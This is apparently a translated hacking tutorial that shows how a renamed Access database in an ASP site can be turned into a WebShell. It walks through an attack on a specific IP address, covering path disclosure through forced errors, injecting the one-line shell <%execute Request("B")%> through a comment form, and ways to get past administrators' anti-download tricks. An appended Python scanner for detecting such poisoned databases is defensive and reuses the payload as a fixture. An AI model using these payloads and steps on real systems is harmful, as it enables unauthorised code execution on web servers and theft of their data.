Perhaps because network security technology has developed and administrators have improved, in Access+ASP systems the MDB database is now often renamed to .asp or .asa to stop it from being downloaded. Leaving aside that a database with a changed suffix can still be downloaded directly with Net Fast and similar download tools, the rename in fact opens a door for intruders: a database with an .asp/.asa suffix can be used to obtain a WebShell directly.
1. Approach
Everyone knows that <% %> is the ASP script delimiter: only the code between <% and %> in an .asp file is executed. In an Access+ASP web system all data is stored in the database file (the MDB). Once the administrator has renamed the MDB to .asp, any data we submit that contains <% %> will be executed as code when the .asp database is requested. So we only need to submit code into the database, and the .asp-suffixed database becomes our WebShell.
2. Example
Find a target. First we force a database error to reveal the path and check whether the database has an .asp suffix:
<http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210>
It returns:
Microsoft VBScript compilation error '800a03f6': Expected 'End'. /iishelp/common/500-100.asp, line 4. Microsoft JET Database Engine error '80004005': 'D:\log_mdb\%29dlog_mdb%29.asp' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides. /test/conn.asp, line
We submit <http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp> and it returns a heap of garbled characters. At this point the database could be downloaded directly with a download tool such as Net Fast (not discussed here). Back on the homepage we see a "User Comments" feature. We register a user and post a comment:
<%execute Request ("B")%>
So the ASP code <%execute Request ("B")%> is written into the database, and the database is now our WebShell. Submitting <http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp> again, at the end of the garbled output we see:
/iishelp/common/500-100.asp, line 4 Microsoft VBScript runtime error '800a000d': Type mismatch: 'Execut /test/dlog/log_mdb/%29dlog_mdb%29.asp, line 26
Haha, our inserted code is running. See the figure below:
Note: the code submitted to the database cannot be too long, which is why we use <%execute request ("B")%>.
3. Other questions and ideas
1. Besides renaming the suffix to .asp, some administrators also add invalid ASP code such as <%= ' a ' -1%> to the database to block downloading completely. Because that invalid code comes first, inserting our WebShell code after it only produces the error from the earlier invalid code, and our shell code is never executed. Although this prevents a certain kind of attack, it still has a hidden flaw: by adding error-tolerant code in front of the erroring code, we can get our inserted WebShell code to execute and display correctly.
2. If the suffix is not changed, i.e. the file is still an MDB, we can download it directly to get the backend password, log in to the backend, and use the database backup feature to change the suffix to .asp.
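A defender-side check, added here and not part of the original article: walk an IIS webroot, find files with script-mapped extensions whose bytes carry the Jet/ACE database signature (a renamed MDB), and flag those that already contain an ASP tag. The sample webroot, its file names and contents are constructed for the demonstration.

```python
import os
import tempfile

# Jet/ACE database files carry a fixed text signature at byte offset 4.
JET_SIGNATURES = (b"Standard Jet DB", b"Standard ACE DB")
# Extensions classic IIS hands to asp.dll; a database stored under one of
# these is executable script from the server's point of view.
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".cdx"}
ASP_TAG = b"<%"

def classify_file(path):
    """Return 'exposed' or 'poisoned' for a database posing as script, else None."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in SCRIPT_EXTS:
        return None
    with open(path, "rb") as f:
        data = f.read()
    if data[4:19] not in JET_SIGNATURES:
        return None          # genuine ASP source, not a renamed database
    if ASP_TAG in data:
        return "poisoned"    # stored data already carries an ASP tag
    return "exposed"         # renamed database reachable as a script URL

def scan_webroot(root):
    """Map every suspicious file under root (relative path) to its finding."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            result = classify_file(full)
            if result:
                findings[os.path.relpath(full, root)] = result
    return findings

def build_sample_webroot():
    """Constructed fixture: a clean ASP page, a renamed MDB, and a poisoned one."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "log_mdb"))
    header = b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 64
    with open(os.path.join(root, "conn.asp"), "wb") as f:
        f.write(b'<%\r\nSet conn = Server.CreateObject("ADODB.Connection")\r\n%>')
    with open(os.path.join(root, "log_mdb", "clean_db.asp"), "wb") as f:
        f.write(header + b"admin record data")
    with open(os.path.join(root, "log_mdb", "poisoned_db.asp"), "wb") as f:
        f.write(header + b'user comment: <%execute Request("B")%>')
    return root

if __name__ == "__main__":
    for rel, finding in sorted(scan_webroot(build_sample_webroot()).items()):
        print(f"{finding:9s} {rel}")
```

Any "exposed" hit means the database should be moved outside the webroot rather than renamed; a "poisoned" hit means stored data has already been tampered with and the comment or log tables need reviewing.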
There is much more that could be made of this, too.